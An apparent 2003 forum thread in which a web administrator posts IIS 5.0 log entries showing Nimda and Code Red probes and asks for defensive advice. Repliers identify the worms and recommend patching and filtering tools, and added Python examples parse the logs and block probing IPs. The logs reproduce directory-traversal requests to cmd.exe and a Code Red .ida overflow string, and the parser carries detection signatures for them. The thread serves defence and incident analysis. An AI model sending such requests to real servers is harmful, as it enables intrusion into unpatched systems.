Solved

IIS 5.0 log files produce odd url requests

Posted on 2003-03-16
4
Medium Priority
333 Views
Last Modified: 2010-04-11
I'm almost sure this is either a virus like Code Red or Nimda, but I also think it's intentionally done. I believe someone is trying to find an exploit for my web server, which is Windows 2000 Advanced Server with Service Pack 3 and IIS 5.0.
Below is a brief look at the log file that the connection scanning me has made. I'm just interested if someone can tell me if I'm right, and also how to prevent against future attacks, etc.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-16 00:27:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:42 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:42:16 202.100.108.18 - 22.22.22.22 80 GET / - 400 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.224 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:42:59 24.198.93.214 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.224 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:05 24.198.93.214 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

For security reasons I changed my IP to 22.22.22.22.
OK well, if anyone can give me some more insight into this, a link to a web site, a tutorial on IIS logging and how to determine hacker attacks would be great too. Thanks.
Question by:nonsence
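As an added example, not code from the question or from anyone in this thread: a small Python parser for the W3C extended log format IIS 5.0 writes, driven by the #Fields directive, plus a classifier that tags the Nimda and Code Red probe patterns visible in the log above and reports them per source IP with the response status. The sample log, the signature names and the function names are constructed for this illustration.

```python
import urllib.parse
from collections import defaultdict

# Constructed sample in the IIS 5.0 W3C extended format from the question
# (source IPs are illustrative; 22.22.22.22 is the poster's anonymised server).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXX%u9090%u6858%ucbd3=a 200 -
2003-03-16 01:10:00 10.0.0.5 - 22.22.22.22 80 GET /index.html - 200 Mozilla/4.0
"""

# Substrings of the worm probes in the question's log, matched against the
# URL-decoded, lower-cased path so encoded or mixed-case spellings still match.
WORM_SIGNATURES = {
    "root.exe": "Nimda / Code Red II backdoor",
    "cmd.exe": "Nimda traversal to cmd.exe",
    "default.ida": "Code Red .ida overflow",
}

def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # the directive names the columns
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):   # skip truncated or malformed lines
                yield dict(zip(fields, values))

def classify(entry):
    """Return the worm name a request matches, or None for ordinary traffic."""
    path = urllib.parse.unquote(entry["cs-uri-stem"]).lower()
    for needle, name in WORM_SIGNATURES.items():
        if needle in path:
            return name
    return None

def scan(text):
    """Map each source IP to the (worm, sc-status) pairs it produced."""
    # 404/500 means the probe found nothing; a 200 on a worm request is the
    # one case worth checking against the server's patch level.
    hits = defaultdict(set)
    for entry in parse_w3c(text):
        name = classify(entry)
        if name:
            hits[entry["c-ip"]].add((name, entry["sc-status"]))
    return dict(hits)
```

Run it against a real IIS log file by reading the file into scan(); entries whose column count does not match the #Fields line are skipped rather than mis-parsed.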
4 Comments
 
LVL 1

Accepted Solution

by:
PaulBobby earned 150 total points
ID: 8146483
Yes that's Nimda and the new Code Red.

It's what I call the 'background radiation' of the Internet.

If you're running the latest patches, you'll be fine with respect to these attacks that is :)

There are many different variants of Nimda, and Code Red.

Read about the first incarnation of Nimda at http://vil.mcafee.com/dispVirus.asp?virus_k=99209

 
LVL 9

Expert Comment

by:blakogre
ID: 8146710
Here's a tip:  many of these attacks, and future attacks, revolve around privilege escalation: the attacker's code runs under the powerful SYSTEM account.  Notice how the code is going after cmd.exe?

Apply NTFS permissions to CMD.exe denying the SYSTEM account access to that file.  They'll be prevented from executing the code, and any future code will be stymied as well, assuming it uses privilege escalation.

Keep in mind: this will not cause issues with scripts.  It WILL prevent win2k "File System Protection" from being able to update the file.  To me, a minor tradeoff.  
 
LVL 1

Expert Comment

by:sKuLLsHoT
ID: 8149098
I would install the URLScan filter from Microsoft onto your server; it will catch malicious requests such as this and log them separately. Also look at Microsoft's IISLockD tool. Although it's Microsoft, these 2 utilities can go a long way to making IIS very secure.

One final thing to look at is Microsoft Baseline Security advisor - it gets all the hotfixes and security patches you need for the system.

All these can be found on Microsoft's IIS website, but using Google to find the tools is probably much easier.
 
LVL 3

Author Comment

by:nonsence
ID: 8149173
I know about URLScan and IISLockD. I also use SecureIIS and ServerMask as two 3rd party tools. Anyone know any others?

This isn't by chance something smart enough that can log such activity and then block incoming access from the attacking IP address for, let's say, a few hours to a day, is there?
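The author's last question, temporarily blocking an address that keeps probing, as an added example that is not from anyone in this thread: a small Python block list with a probe-count threshold, a time window and an expiry, fed with the probe timestamps from the log above. The PROBES list, the class and the function names are constructed for this illustration; pushing the resulting entries into a firewall or IIS IP restriction is left to the deployment.

```python
from datetime import datetime, timedelta

# Constructed input: (timestamp, source IP) of worm probes, with times and IPs from the question's log.
PROBES = [
    ("2003-03-16 00:27:37", "24.76.172.162"),
    ("2003-03-16 00:27:38", "24.76.172.162"),
    ("2003-03-16 00:27:39", "24.76.172.162"),
    ("2003-03-16 00:42:58", "24.198.93.214"),
    ("2003-03-16 01:07:00", "24.42.100.192"),
]

def parse_ts(stamp):
    """Combine the W3C 'date time' columns (UTC by default in IIS) into a datetime."""
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")

class ProbeBlocker:
    """Temporary block list: an IP that sends `threshold` probes within
    `window_minutes` is blocked for `block_hours`, then released automatically."""
    def __init__(self, threshold=3, window_minutes=10, block_hours=6):
        self.threshold = threshold
        self.window = timedelta(minutes=window_minutes)
        self.block_for = timedelta(hours=block_hours)
        self.recent = {}    # ip -> probe timestamps still inside the window
        self.blocked = {}   # ip -> time at which the block expires

    def is_blocked(self, ip, now):
        """True while the block is live; an expired entry is dropped on the way."""
        expiry = self.blocked.get(ip)
        if expiry is None:
            return False
        if now >= expiry:
            del self.blocked[ip]
            return False
        return True

    def observe(self, when, ip):
        """Record one probe; return True only when it triggers a new block."""
        if self.is_blocked(ip, when):
            return False                       # already blocked, nothing to add
        times = [t for t in self.recent.get(ip, []) if when - t <= self.window]
        times.append(when)
        self.recent[ip] = times
        if len(times) < self.threshold:
            return False
        self.blocked[ip] = when + self.block_for
        self.recent.pop(ip)                    # count afresh once the block lapses
        return True

def run(probes, **limits):
    blocker = ProbeBlocker(**limits)
    return blocker, [ip for stamp, ip in probes if blocker.observe(parse_ts(stamp), ip)]
```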
